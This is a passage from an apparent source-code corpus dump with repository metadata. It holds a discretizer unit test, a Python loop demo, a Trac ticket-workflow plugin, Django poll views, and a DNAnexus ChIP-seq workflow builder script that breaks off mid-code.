        # Expected bin labels for entropy-based discretization; bin counts
        # vary per feature because splits come from the class labels.
        self.maxDiff = None
        discretizer = EntropyDiscretizer(self.x, [], self.feature_names,
                                         self.y, random_state=10)
        self.assertDictEqual(
            {0: ['sepal length (cm) <= 4.85',
                 '4.85 < sepal length (cm) <= 5.45',
                 '5.45 < sepal length (cm) <= 5.55',
                 '5.55 < sepal length (cm) <= 5.85',
                 '5.85 < sepal length (cm) <= 6.15',
                 '6.15 < sepal length (cm) <= 7.05',
                 'sepal length (cm) > 7.05'],
             1: ['sepal width (cm) <= 2.45',
                 '2.45 < sepal width (cm) <= 2.95',
                 '2.95 < sepal width (cm) <= 3.05',
                 '3.05 < sepal width (cm) <= 3.35',
                 '3.35 < sepal width (cm) <= 3.45',
                 '3.45 < sepal width (cm) <= 3.55',
                 'sepal width (cm) > 3.55'],
             2: ['petal length (cm) <= 2.45',
                 '2.45 < petal length (cm) <= 4.45',
                 '4.45 < petal length (cm) <= 4.75',
                 '4.75 < petal length (cm) <= 5.15',
                 'petal length (cm) > 5.15'],
             3: ['petal width (cm) <= 0.80',
                 '0.80 < petal width (cm) <= 1.35',
                 '1.35 < petal width (cm) <= 1.75',
                 '1.75 < petal width (cm) <= 1.85',
                 'petal width (cm) > 1.85']},
            discretizer.names)
| [
"bruno.filipe.silva.dias@gmail.com"
] | bruno.filipe.silva.dias@gmail.com |
33f9f615f757e2f55f53d6b631f702238525a791 | 4124ea6a88f11cbd5967a6c8570a23ea6b43e01d | /代码/hei_ma/Demo04_while循环.py | b348f11621c22d3138e67b9047ee8701c0d63ec4 | [] | no_license | ZYSLLZYSLL/Python | 75a26f953808c4aa29a98a97d43cf5509f6e569c | b83451567517b8c77bafece95126e67f4a19755e | refs/heads/master | 2023-03-29T12:49:31.559651 | 2021-03-22T05:18:19 | 2021-03-22T05:18:19 | 349,715,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2021/1/7 16:13
# @Author : ZY
# @File : Demo04_while循环.py
# @Project : code
# 需求:重复五次“hello world”
# Requirement: print "hello world" five times.
count = 0
while count < 5:
    print("hello world")
    count += 1
| [
"15239938038@163.com"
] | 15239938038@163.com |
2817e381387844503d0a8a23ce38dce22987fa80 | 4569d707a4942d3451f3bbcfebaa8011cc5a128d | /typedticketworkflowplugin/0.11/typedworkflow/controller.py | 953eba41a2c646cb88e789e751aa9e107b752c84 | [] | no_license | woochica/trachacks | 28749b924c897747faa411876a3739edaed4cff4 | 4fcd4aeba81d734654f5d9ec524218b91d54a0e1 | refs/heads/master | 2021-05-30T02:27:50.209657 | 2013-05-24T17:31:23 | 2013-05-24T17:31:23 | 13,418,837 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | from trac.core import implements, Component
from trac.ticket import model
from trac.ticket.api import ITicketActionController
from trac.ticket.default_workflow import ConfigurableTicketWorkflow
class TypedTicketWorkflow(ConfigurableTicketWorkflow):
    """Add type attribute filter """

    def get_ticket_actions(self, req, ticket):
        all_actions = ConfigurableTicketWorkflow.get_ticket_actions(
            self, req, ticket)
        return self.filter_actions(all_actions, ticket)

    def filter_actions(self, action, ticket):
        """Return only the (weight, name) pairs whose optional
        ``tickettype`` attribute matches this ticket's type."""
        applicable = []
        for default, action_name in action:
            attributes = self.actions[action_name]
            if 'tickettype' not in attributes:
                # No type restriction: the action always applies.
                applicable.append((default, action_name))
                continue
            # TODO: normalization -- this should be done only once.
            required_types = [entry.strip()
                              for entry in attributes['tickettype'].split(',')]
            if ticket.get_value_or_default('type') in required_types:
                applicable.append((default, action_name))
        return applicable
"kivsiak@7322e99d-02ea-0310-aa39-e9a107903beb"
] | kivsiak@7322e99d-02ea-0310-aa39-e9a107903beb |
dde16a1e32e69757b5fbd798809ccbcf942a874f | e1f73211a76e1afebb8ffca06a3f5b7b8947ece9 | /polls/views.py | 20e19d68e76705be5454461084798af2a89e63c9 | [] | no_license | sunilBzl/polls-app | 5dd1421bab9c47c4bbb3bece83789fc91fd7ba30 | 3461f41d630f527711b9d00b8e5813b38d2fe6f1 | refs/heads/main | 2023-08-26T06:02:52.500081 | 2021-11-02T03:52:51 | 2021-11-02T03:52:51 | 423,446,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,200 | py | from django.http import HttpResponse, HttpResponseRedirect
from django.db.models import F
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views import generic

from .models import Choice, Question
# Create your views here.
class IndexView(generic.ListView):
    """Landing page listing the most recently published questions."""
    template_name = 'polls/index.html'
    context_object_name = 'latest_question_list'

    def get_queryset(self):
        """Return the five newest questions, most recent first."""
        newest_first = Question.objects.order_by('-pub_date')
        return newest_first[:5]
class DetailView(generic.DetailView):
    """Detail page for a single question (renders polls/detail.html)."""
    model = Question
    template_name = 'polls/detail.html'
class ResultView(generic.DetailView):
    """Results page showing vote tallies for a question (polls/results.html)."""
    model = Question
    template_name = 'polls/results.html'
def vote(request, question_id):
    """Record a vote for one choice of the given question.

    On a missing/invalid POSTed choice, redisplay the detail page with an
    error message; on success, redirect to the results page.
    """
    question = get_object_or_404(Question, pk = question_id)
    try:
        selected_choice = question.choice_set.get(pk=request.POST['choice'])
    except (KeyError, Choice.DoesNotExist):
        # KeyError: no 'choice' key in POST; DoesNotExist: stale/invalid pk.
        return render(request, 'polls/detail.html', {
            'question':question,
            'error_message': "You didn't select a choice.",
        })
    else:
        # Use an F() expression so the increment happens in the database,
        # avoiding the read-modify-write race between concurrent voters.
        selected_choice.votes = F('votes') + 1
        selected_choice.save()
        # Always redirect after successfully handling POST data, so a
        # Back/Refresh doesn't submit the vote twice.
        return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"sunil.bhujel@aayulogic.com"
] | sunil.bhujel@aayulogic.com |
a6a0280c8e64c9065944e620048f6383364b2778 | 5c205eab11d14b63e9fa7267d353448bc3761757 | /dnanexus/tf_workflow.py | ebec312ef82cccbec7f9d076eeb5a0068a9b8fef | [] | no_license | huboqiang/tf_chipseq | 909e07fa57698b398c957e47acae481691b04a57 | 6564b2e8f332b23d849c408e205781782f561ede | refs/heads/master | 2020-12-24T02:22:44.284115 | 2015-03-13T22:12:21 | 2015-03-13T22:12:21 | 32,879,755 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,183 | py | #!/usr/bin/env python
'''Instantiate the ENCODE ChIP-seq workflow'''
import pdb
import os.path, sys, subprocess, logging, re
import dxpy
EPILOG = '''Notes:
Examples:
Build blank workflow from fastq to peaks (no IDR)
%(prog)s
Build a blank workflow that includes both naive peak calling and IDR.
%(prog)s --idr
Build and run a workflow, specifying fastq's for two replicates and matched controls, including naive peaks and IDR.
%(prog)s --rep1 r1.fastq.gz --rep2 r2.fastq.gz --ctl1 c1.fastq.gz --ctl2 c2.fastq.gz --idr --yes
Build and run a workflow, specifying fastq's for two replicates and matched controls, reporting only IDR-processed peaks.
%(prog)s --rep1 r1.fastq.gz --rep2 r2.fastq.gz --ctl1 c1.fastq.gz --ctl2 c2.fastq.gz --idronly --yes
Build and run a workflow, skipping mapping and starting from tagAligns from paired-end data, reporting both naive and IDR-processed peaks.
%(prog)s --rep1 f1.tagAlign.gz --rep2 r2.tagAlign.gz --ctl1 c1.tagAlign.gz --ctl2 c2.tagAlign.gz --rep1pe --rep2pe --idr --yes
'''
# Metadata for the DNAnexus workflow object created in main().
WF_TITLE = 'tf_chip_seq'
WF_DESCRIPTION = 'ENCODE TF ChIP-Seq Pipeline'

# Names of the applets (resolved via find_applet_by_name) that implement the
# individual pipeline stages.
MAPPING_APPLET_NAME = 'encode_bwa'
FILTER_QC_APPLET_NAME = 'filter_qc'
XCOR_APPLET_NAME = 'xcor'
XCOR_ONLY_APPLET_NAME = 'xcor_only'
SPP_APPLET_NAME = 'spp'
POOL_APPLET_NAME = 'pool'
PSEUDOREPLICATOR_APPLET_NAME = 'pseudoreplicator'
ENCODE_SPP_APPLET_NAME = 'encode_spp'
IDR_APPLET_NAME='idr'
ENCODE_IDR_APPLET_NAME='encode_idr'

# Cache of resolved applet handlers, keyed by (applet_name, project_id);
# populated lazily by find_applet_by_name.
APPLETS = {}
def get_args():
    """Parse command-line options for the workflow builder.

    Side effects: sets the module-level DEBUG flag and configures logging
    before returning the parsed argument namespace.
    """
    import argparse
    ap = argparse.ArgumentParser(
        description=__doc__, epilog=EPILOG,
        formatter_class=argparse.RawDescriptionHelpFormatter)

    ap.add_argument('--debug', help="Print debug messages", default=False, action='store_true')
    ap.add_argument('--reference', help="Reference tar to map to", default='ENCODE Reference Files:/hg19/hg19_XY.tar.gz')
    ap.add_argument('--rep1', help="Replicate 1 fastq or tagAlign", default=None, nargs='*')
    ap.add_argument('--rep2', help="Replicate 2 fastq or tagAlign", default=None, nargs='*')
    ap.add_argument('--ctl1', help="Control for replicate 1 fastq or tagAlign", default=None, nargs='*')
    ap.add_argument('--ctl2', help="Control for replicate 2 fastq or tagAlign", default=None, nargs='*')
    ap.add_argument('--outp', help="Output project name or ID", default=dxpy.WORKSPACE_ID)
    ap.add_argument('--outf', help="Output folder name or ID", default="/analysis_run")
    ap.add_argument('--name', help="Name of new workflow", default="TF ChIP-Seq")
    ap.add_argument('--applets', help="Name of project containing applets", default="E3 ChIP-seq")
    ap.add_argument('--nomap', help='Given tagAligns, skip to peak calling', default=False, action='store_true')
    ap.add_argument('--rep1pe', help='Specify rep1 is paired end (only if --nomap)', default=False, action='store_true')
    ap.add_argument('--rep2pe', help='Specify rep2 is paired end (only if --nomap)', default=False, action='store_true')
    ap.add_argument('--blacklist', help="Blacklist to filter IDR peaks", default='ENCODE Reference Files:/hg19/blacklists/wgEncodeDacMapabilityConsensusExcludable.bed.gz')
    ap.add_argument('--idr', help='Report peaks with and without IDR analysis', default=False, action='store_true')
    ap.add_argument('--idronly', help='Only report IDR peaks', default=None, action='store_true')
    ap.add_argument('--yes', help='Run the workflow', default=False, action='store_true')

    parsed = ap.parse_args()

    global DEBUG
    DEBUG = parsed.debug
    if DEBUG:
        logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
    else:
        # use the default logging level
        logging.basicConfig(format='%(levelname)s:%(message)s')

    logging.debug("rep1 is: %s" % (parsed.rep1))
    return parsed
def blank_workflow(args):
    # NOTE(review): unimplemented stub (returns None); building a blank
    # workflow is currently handled inline in main().
    return
def map_and_filter(infile, args):
    # NOTE(review): unimplemented stub. Both branches return the set {None}
    # (a set containing None) -- presumably a placeholder for a set of stage
    # ids; confirm before wiring this in. Mapping is done inline in main().
    if not infile:
        return {None}
    stages = {None}
    return stages
def call_peaks(expvsctl, args):
    # NOTE(review): unimplemented stub, mirroring map_and_filter above; both
    # branches return the placeholder set {None}. Peak-calling stages are
    # currently added inline in main().
    if not expvsctl:
        return {None}
    stages = {None}
    return stages
def resolve_project(identifier, privs='r'):
    """Return a DNAnexus project handler for *identifier* (name or dxid).

    Tries an exact-name lookup first, then falls back to treating the
    identifier as a dxid. Raises ValueError when the project cannot be
    found, or when write access (privs='w') is requested but the project is
    only viewable.
    """
    project = dxpy.find_one_project(name=identifier, level='VIEW', name_mode='exact', return_handler=True, zero_ok=True)
    if project is None:  # 'is None' rather than '== None'
        try:
            project = dxpy.get_handler(identifier)
        except Exception:  # narrowed from a bare except
            logging.error('Could not find a unique project with name or id %s' %(identifier))
            raise ValueError(identifier)
    logging.debug('Project %s access level is %s' %(project.name, project.describe()['level']))
    if privs == 'w' and project.describe()['level'] == 'VIEW':
        logging.error('Output project %s is read-only' %(identifier))
        raise ValueError(identifier)
    return project
def resolve_folder(project, identifier):
    """Return the folder path *identifier* within *project*, creating it if needed.

    The path is normalized to start with '/'. Raises ValueError when the
    folder neither exists nor can be created.
    """
    if not identifier.startswith('/'):
        identifier = '/' + identifier
    try:
        project.list_folder(identifier)
    except Exception:  # folder does not exist (or listing failed) -- create it
        try:
            project.new_folder(identifier, parents=True)
        except Exception:
            logging.error("Cannot create folder %s in project %s" %(identifier, project.name))
            raise ValueError('%s:%s' %(project.name, identifier))
        else:
            logging.info("New folder %s created in project %s" %(identifier, project.name))
    return identifier
def resolve_file(identifier):
    """Resolve *identifier* to a DNAnexus file handler, or None if not found.

    The identifier is tried, in order, as:
      1. "[project:]folder/filename" -- exact-name lookup in the named
         project (or the current workspace when no project prefix is given),
      2. a raw file dxid,
      3. an ENCODE accession (delegated to resolve_accession).
    """
    logging.debug("resolve_file: %s" %(identifier))
    if not identifier:
        return None
    # Split an optional "project:" prefix off the identifier.
    m = re.match(r'''^([\w\-\ \.]+):([\w\-\ /\.]+)''', identifier)
    if m:
        project_identifier = m.group(1)
        file_identifier = m.group(2)
    else:
        logging.debug("Defaulting to the current project")
        project_identifier = dxpy.WORKSPACE_ID
        file_identifier = identifier
    project = resolve_project(project_identifier)
    logging.debug("Got project %s" %(project.name))
    logging.debug("Now looking for file %s" %(file_identifier))
    # Split the remaining identifier into a folder path and a file name.
    m = re.match(r'''(^[\w\-\ /\.]+)/([\w\-\ \.]+)''', file_identifier)
    if m:
        folder_name = m.group(1)
        if not folder_name.startswith('/'):
            folder_name = '/' + folder_name
        file_name = m.group(2)
    else:
        folder_name = '/'
        file_name = file_identifier
    logging.debug("Looking for file %s in folder %s" %(file_name, folder_name))
    # Fallback chain: name lookup -> dxid -> ENCODE accession.
    try:
        file_handler = dxpy.find_one_data_object(name=file_name, folder=folder_name, project=project.get_id(),
            more_ok=False, zero_ok=False, return_handler=True)
    except:
        logging.debug('%s not found in project %s folder %s' %(file_name, project.get_id(), folder_name))
        try:
            file_handler = dxpy.DXFile(dxid=identifier, mode='r')
        except:
            logging.debug('%s not found as a dxid' %(identifier))
            try:
                file_handler = resolve_accession(identifier)
            except:
                logging.debug('%s not found as an accession' %(identifier))
                logging.warning('Could not find file %s.' %(identifier))
                return None
    logging.info("Resolved file identifier %s to %s" %(identifier, file_handler.get_id()))
    return file_handler
def resolve_accession(accession):
    """Resolve an ENCODE accession (ENCFFnnnXXX) to a file handler.

    Looks the accession up (as a glob, to match suffixed filenames) in the
    ENCODE snapshot project. Raises ValueError when the accession is
    malformed or cannot be found.
    """
    logging.debug("Looking for accession %s" %(accession))
    if not re.match(r'''^ENCFF\d{3}[A-Z]{3}''', accession):
        logging.debug("%s is not a valid accession format" %(accession))
        raise ValueError(accession)
    DNANEXUS_ENCODE_SNAPSHOT = 'ENCODE-SDSC-snapshot-20140505'
    logging.debug('Testing')
    # Lazily resolve and cache the snapshot project in a module-level global;
    # the bare name reference below raises NameError on the first call.
    # NOTE(review): declaring `global snapshot_project` after the name has
    # been referenced in the same function is a SyntaxError under Python 3;
    # this code appears to target Python 2.
    try:
        snapshot_project
    except:
        logging.debug('Looking for snapshot project %s' %(DNANEXUS_ENCODE_SNAPSHOT))
        try:
            project_handler = resolve_project(DNANEXUS_ENCODE_SNAPSHOT)
            global snapshot_project
            snapshot_project = project_handler
        except:
            logging.error("Cannot find snapshot project %s" %(DNANEXUS_ENCODE_SNAPSHOT))
            raise ValueError(DNANEXUS_ENCODE_SNAPSHOT)
        logging.debug('Found snapshot project %s' %(snapshot_project.name))
    try:
        # Glob search: stored filenames carry suffixes after the accession.
        accession_search = accession + '*'
        logging.debug('Looking recursively for %s in %s' %(accession_search, snapshot_project.name))
        file_handler = dxpy.find_one_data_object(
            name=accession_search, name_mode='glob', more_ok=False, classname='file', recurse=True, return_handler=True,
            folder='/', project=snapshot_project.get_id())
        logging.debug('Got file handler for %s' %(file_handler.name))
        return file_handler
    except:
        logging.error("Cannot find accession %s in project %s" %(accession, snapshot_project.name))
        raise ValueError(accession)
def find_applet_by_name(applet_name, applets_project_id):
    '''Looks up an applet by name in the project that holds tools. From Joe Dale's code.'''
    key = (applet_name, applets_project_id)
    if key in APPLETS:
        # Cache hit: prefix the log line with '*' to mark it as cached.
        cache_marker = '*'
    else:
        APPLETS[key] = dxpy.find_one_data_object(classname="applet", name=applet_name,
                                                 project=applets_project_id,
                                                 zero_ok=False, more_ok=False, return_handler=True)
        cache_marker = ''
    logging.info(cache_marker + "Resolved applet %s to %s" %(applet_name, APPLETS[key].get_id()))
    return APPLETS[key]
def main():
    """Build (and with --yes, launch) the ENCODE TF ChIP-seq workflow on DNAnexus.

    Resolves the output and applet projects, creates a new workflow object,
    then wires up stages in up to three phases:
      1. per-replicate/control mapping, filter-QC and cross-correlation
         (skipped with --nomap, where xcor-only stages are added instead),
      2. naive SPP peak calls per replicate (skipped with --idronly),
      3. SPP peaks for IDR plus the IDR comparison stages (--idr/--idronly).
    """
    args = get_args()

    output_project = resolve_project(args.outp, 'w')
    logging.info('Found output project %s' %(output_project.name))
    output_folder = resolve_folder(output_project, args.outf)
    logging.info('Using output folder %s' %(output_folder))
    applet_project = resolve_project(args.applets, 'r')
    logging.info('Found applet project %s' %(applet_project.name))

    workflow = dxpy.new_dxworkflow(
        title=WF_TITLE,
        name=args.name,
        description=WF_DESCRIPTION,
        project=output_project.get_id(),
        folder=output_folder)

    # No input files at all means: build an empty "template" workflow whose
    # stage inputs are to be filled in later through the UI/API.
    blank_workflow = not (args.rep1 or args.rep2 or args.ctl1 or args.ctl2)

    if not args.nomap:
        #this whole strategy is fragile and unsatisfying
        #subsequent code assumes reps come before contols
        #a "superstage" is just a dict with a name, name(s) of input files, and then names and id's of stages that process that input
        #each superstage here could be implemented as a stage in a more abstract workflow. That stage would then call the various applets that are separate
        #stages here.
        mapping_superstages = [
            {'name': 'Rep1', 'input_args': args.rep1},
            {'name': 'Rep2', 'input_args': args.rep2},
            {'name': 'Ctl1', 'input_args': args.ctl1},
            {'name': 'Ctl2', 'input_args': args.ctl2}
            # {'name': 'Pooled Reps', 'input_args': (args.rep1 and args.rep2)},
            # {'name': 'Pooled Controls', 'input_args': (args.ctl1 and args.ctl2)} ##idea is to create a "stub" stage and then populate it's input with the output of the pool stage, defined below
        ]

        mapping_applet = find_applet_by_name(MAPPING_APPLET_NAME, applet_project.get_id())
        mapping_output_folder = resolve_folder(output_project, output_folder + '/' + mapping_applet.name)
        reference_tar = resolve_file(args.reference)
        filter_qc_applet = find_applet_by_name(FILTER_QC_APPLET_NAME, applet_project.get_id())
        filter_qc_output_folder = mapping_output_folder
        xcor_applet = find_applet_by_name(XCOR_APPLET_NAME, applet_project.get_id())
        xcor_output_folder = mapping_output_folder

        # For each rep/control, chain map -> filter_qc -> xcor, recording the
        # stage ids on the superstage dict so later stages can reference them.
        for mapping_superstage in mapping_superstages:
            superstage_name = mapping_superstage.get('name')
            if mapping_superstage.get('input_args') or blank_workflow:
                if blank_workflow:
                    mapping_stage_input = None
                else:
                    mapping_stage_input = {'reference_tar' : dxpy.dxlink(reference_tar.get_id())}
                    for arg_index,input_arg in enumerate(mapping_superstage['input_args']): #read pairs assumed be in order read1,read2
                        reads = dxpy.dxlink(resolve_file(input_arg).get_id())
                        mapping_stage_input.update({'reads%d' %(arg_index+1): reads})
                mapped_stage_id = workflow.add_stage(
                    mapping_applet,
                    name='Map %s' %(superstage_name),
                    folder=mapping_output_folder,
                    stage_input=mapping_stage_input
                )
                mapping_superstage.update({'map_stage_id': mapped_stage_id})

                filter_qc_stage_id = workflow.add_stage(
                    filter_qc_applet,
                    name='Filter_QC %s' %(superstage_name),
                    folder=filter_qc_output_folder,
                    stage_input={
                        'input_bam': dxpy.dxlink({'stage': mapped_stage_id, 'outputField': 'mapped_reads'}),
                        'paired_end': dxpy.dxlink({'stage': mapped_stage_id, 'outputField': 'paired_end'})
                    }
                )
                mapping_superstage.update({'filter_qc_stage_id': filter_qc_stage_id})

                xcor_stage_id = workflow.add_stage(
                    xcor_applet,
                    name='Xcor %s' %(superstage_name),
                    folder=xcor_output_folder,
                    stage_input={
                        'input_bam': dxpy.dxlink({'stage': filter_qc_stage_id, 'outputField': 'filtered_bam'}),
                        'paired_end': dxpy.dxlink({'stage': filter_qc_stage_id, 'outputField': 'paired_end'})
                    }
                )
                mapping_superstage.update({'xcor_stage_id': xcor_stage_id})

        # Collect the xcor outputs (tagAligns and CC score files) by name for
        # use as inputs to the downstream peak-calling stages.
        exp_rep1_ta = dxpy.dxlink(
                    {'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep1'),
                     'outputField': 'tagAlign_file'})
        exp_rep1_cc = dxpy.dxlink(
                    {'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep1'),
                     'outputField': 'CC_scores_file'})
        exp_rep2_ta = dxpy.dxlink(
                    {'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep2'),
                     'outputField': 'tagAlign_file'})
        exp_rep2_cc = dxpy.dxlink(
                    {'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep2'),
                     'outputField': 'CC_scores_file'})
        ctl_rep1_ta = dxpy.dxlink(
                    {'stage' : next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Ctl1'),
                     'outputField': 'tagAlign_file'})
        ctl_rep2_ta = dxpy.dxlink(
                    {'stage' : next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Ctl2'),
                     'outputField': 'tagAlign_file'})
        rep1_paired_end = dxpy.dxlink(
                        {'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep1'),
                         'outputField': 'paired_end'})
        rep2_paired_end = dxpy.dxlink(
                        {'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep2'),
                         'outputField': 'paired_end'})
    else: #skipped the mapping, so just bring in the inputs from arguments
        exp_rep1_ta = dxpy.dxlink(resolve_file(args.rep1[0]).get_id())
        exp_rep2_ta = dxpy.dxlink(resolve_file(args.rep2[0]).get_id())
        ctl_rep1_ta = dxpy.dxlink(resolve_file(args.ctl1[0]).get_id())
        ctl_rep2_ta = dxpy.dxlink(resolve_file(args.ctl2[0]).get_id())
        rep1_paired_end = args.rep1pe
        rep2_paired_end = args.rep2pe

        #here we need to calculate the cc scores files, because we're only being supplied tagAligns
        #if we had mapped everything above we'd already have a handle to the cc file
        xcor_only_applet = find_applet_by_name(XCOR_ONLY_APPLET_NAME, applet_project.get_id())
        xcor_output_folder = resolve_folder(output_project, output_folder + '/' + xcor_only_applet.name)
        xcor_only_stages = []

        exp_rep1_cc_stage_id = workflow.add_stage(
            xcor_only_applet,
            name="Rep1 cross-correlation",
            folder=xcor_output_folder,
            stage_input={
                'input_tagAlign': exp_rep1_ta,
                'paired_end': rep1_paired_end
            }
        )
        xcor_only_stages.append({'xcor_only_rep1_id': exp_rep1_cc_stage_id})
        exp_rep1_cc = dxpy.dxlink(
                    {'stage': exp_rep1_cc_stage_id,
                     'outputField': 'CC_scores_file'})

        exp_rep2_cc_stage_id = workflow.add_stage(
            xcor_only_applet,
            name="Rep2 cross-correlation",
            folder=xcor_output_folder,
            stage_input={
                'input_tagAlign': exp_rep2_ta,
                'paired_end': rep2_paired_end
            }
        )
        xcor_only_stages.append({'xcor_only_rep2_id': exp_rep2_cc_stage_id})
        exp_rep2_cc = dxpy.dxlink(
                    {'stage': exp_rep2_cc_stage_id,
                     'outputField': 'CC_scores_file'})

    # Naive (non-IDR) SPP peak calls, one stage per replicate/control pair.
    if not args.idronly:
        spp_applet = find_applet_by_name(SPP_APPLET_NAME, applet_project.get_id())
        peaks_output_folder = resolve_folder(output_project, output_folder + '/' + spp_applet.name)
        spp_stages = []
        if (args.rep1 and args.ctl1) or blank_workflow:
            rep1_spp_stage_id = workflow.add_stage(
                spp_applet,
                name='Peaks Rep1',
                folder=peaks_output_folder,
                stage_input={
                    'experiment': exp_rep1_ta,
                    'control': ctl_rep1_ta,
                    'xcor_scores_input': exp_rep1_cc
                }
            )
            spp_stages.append({'name': 'Peaks Rep1', 'stage_id': rep1_spp_stage_id})
        if (args.rep2 and args.ctl2) or blank_workflow:
            rep2_spp_stage_id = workflow.add_stage(
                spp_applet,
                name='Peaks Rep2',
                folder=peaks_output_folder,
                stage_input={
                    'experiment': exp_rep2_ta,
                    'control': ctl_rep2_ta,
                    'xcor_scores_input': exp_rep2_cc
                }
            )
            spp_stages.append({'name': 'Peaks Rep2', 'stage_id': rep2_spp_stage_id})

    # IDR branch: one encode_spp stage produces peaks for true replicates and
    # all pseudoreplicates, then four IDR comparisons plus a final merge.
    if args.idr or args.idronly:
        encode_spp_applet = find_applet_by_name(ENCODE_SPP_APPLET_NAME, applet_project.get_id())
        encode_spp_stages = []
        idr_peaks_output_folder = resolve_folder(output_project, output_folder + '/' + encode_spp_applet.name)
        if (args.rep1 and args.ctl1 and args.rep2 and args.ctl2) or blank_workflow:
            encode_spp_stage_id = workflow.add_stage(
                encode_spp_applet,
                name='Peaks for IDR',
                folder=idr_peaks_output_folder,
                stage_input={
                    'rep1_ta' : exp_rep1_ta,
                    'rep2_ta' : exp_rep2_ta,
                    'ctl1_ta': ctl_rep1_ta,
                    'ctl2_ta' : ctl_rep2_ta,
                    'rep1_xcor' : exp_rep1_cc,
                    'rep2_xcor' : exp_rep2_cc,
                    'rep1_paired_end': rep1_paired_end,
                    'rep2_paired_end': rep2_paired_end
                }
            )
            encode_spp_stages.append({'name': 'Peaks for IDR', 'stage_id': encode_spp_stage_id})

        idr_applet = find_applet_by_name(IDR_APPLET_NAME, applet_project.get_id())
        encode_idr_applet = find_applet_by_name(ENCODE_IDR_APPLET_NAME, applet_project.get_id())
        idr_stages = []
        idr_output_folder = resolve_folder(output_project, output_folder + '/' + idr_applet.name)
        if (args.rep1 and args.ctl1 and args.rep2 and args.ctl2) or blank_workflow or args.idronly:
            idr_stage_id = workflow.add_stage(
                idr_applet,
                name='IDR True Replicates',
                folder=idr_output_folder,
                stage_input={
                    'rep1_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep1_peaks'}),
                    'rep2_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep2_peaks'}),
                    'pooled_peaks': dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'pooled_peaks'})
                }
            )
            idr_stages.append({'name': 'IDR True Replicates', 'stage_id': idr_stage_id})

            idr_stage_id = workflow.add_stage(
                idr_applet,
                name='IDR Rep 1 Self-pseudoreplicates',
                folder=idr_output_folder,
                stage_input={
                    'rep1_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep1pr1_peaks'}),
                    'rep2_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep1pr2_peaks'}),
                    'pooled_peaks': dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep1_peaks'})
                }
            )
            idr_stages.append({'name': 'IDR Rep 1 Self-pseudoreplicates', 'stage_id': idr_stage_id})

            idr_stage_id = workflow.add_stage(
                idr_applet,
                name='IDR Rep 2 Self-pseudoreplicates',
                folder=idr_output_folder,
                stage_input={
                    'rep1_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep2pr1_peaks'}),
                    'rep2_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep2pr2_peaks'}),
                    'pooled_peaks': dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'rep2_peaks'})
                }
            )
            idr_stages.append({'name': 'IDR Rep 2 Self-pseudoreplicates', 'stage_id': idr_stage_id})

            # NOTE(review): the display name below says 'Pseudoeplicates'
            # (typo), but the lookup key appended afterwards is the corrected
            # 'IDR Pooled Pseudoreplicates' and is used consistently below,
            # so behavior is unaffected.
            idr_stage_id = workflow.add_stage(
                idr_applet,
                name='IDR Pooled Pseudoeplicates',
                folder=idr_output_folder,
                stage_input={
                    'rep1_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'pooledpr1_peaks'}),
                    'rep2_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'pooledpr2_peaks'}),
                    'pooled_peaks': dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
                         'outputField': 'pooled_peaks'})
                }
            )
            idr_stages.append({'name': 'IDR Pooled Pseudoreplicates', 'stage_id': idr_stage_id})

            blacklist = resolve_file(args.blacklist)
            idr_stage_id = workflow.add_stage(
                encode_idr_applet,
                name='Final IDR peak calls',
                folder=idr_output_folder,
                stage_input={
                    'reps_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR True Replicates'),
                         'outputField': 'IDR_peaks'}),
                    'r1pr_peaks' : dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR Rep 1 Self-pseudoreplicates'),
                         'outputField': 'IDR_peaks'}),
                    'r2pr_peaks' : dxpy.dxlink(
